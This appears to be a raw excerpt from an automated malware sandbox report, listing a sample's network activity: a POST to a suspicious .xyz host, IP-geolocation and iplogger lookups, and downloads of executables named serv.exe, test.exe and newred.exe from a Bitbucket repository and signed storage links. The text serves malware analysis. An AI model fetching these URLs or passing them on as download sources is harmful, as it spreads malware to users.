buffer:'"C:\Windows \System32\PasswordOnWakeSettingFlyout.exe"' is not recognized as an internal or external command,
operable program or batch file.
console_handle:0x000000000000000b
POST method with no referer header, POST method with no useragent header
suspicious_request
POST http://pokacienon.xyz/
suspicious_features
GET method with no useragent header
suspicious_request
GET https://api.ip.sb/geoip
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-49c8-802a-149bf1d42264/serv.exe?Signature=pn6i4toRFefu0thF36SY2ehfP5o%3D&Expires=1617875783&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=Iu1.paGkjklgsxTllu12XmiT7Jmt91vp&response-content-disposition=attachment%3B%20filename%3D%22serv.exe%22
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-41d2-8876-b14668b5131e/test.exe?Signature=QTjNeEZOEfvGMKnBzCyT7mG4nIg%3D&Expires=1617876243&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=4_MBFBXZdU5kGeZTREx1qRsbERpZ4M_z&response-content-disposition=attachment%3B%20filename%3D%22test.exe%22
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
suspicious_features
GET method with no useragent header
suspicious_request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-42c2-b513-5f9bd398e056/newred.exe?Signature=%2Bly8TEK7wfszfC4CJMdwVZNxl90%3D&Expires=1617876376&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=XZ1Wq9dWgSEXAF.IA6b.w7ImqXWWjs9E&response-content-disposition=attachment%3B%20filename%3D%22newred.exe%22
GET https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
request
GET https://iplogger.org/1tsTg7
request
GET https://iplogger.org/favicon.ico
request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-49c8-802a-149bf1d42264/serv.exe?Signature=pn6i4toRFefu0thF36SY2ehfP5o%3D&Expires=1617875783&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=Iu1.paGkjklgsxTllu12XmiT7Jmt91vp&response-content-disposition=attachment%3B%20filename%3D%22serv.exe%22
request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-41d2-8876-b14668b5131e/test.exe?Signature=QTjNeEZOEfvGMKnBzCyT7mG4nIg%3D&Expires=1617876243&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=4_MBFBXZdU5kGeZTREx1qRsbERpZ4M_z&response-content-disposition=attachment%3B%20filename%3D%22test.exe%22
request
GET https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
request
GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-42c2-b513-5f9bd398e056/newred.exe?Signature=%2Bly8TEK7wfszfC4CJMdwVZNxl90%3D&Expires=1617876376&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=XZ1Wq9dWgSEXAF.IA6b.w7ImqXWWjs9E&response-content-disposition=attachment%3B%20filename%3D%22newred.exe%22
buffer:MZ ÿÿ ¸ @ º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ PE L àIH à 0 P Re @ À @ e O ä äd H .text O P `.rsrc ä T @ @.reloc \ @ B base_address:0x00400000 process_identifier:2848 process_handle:0x00000290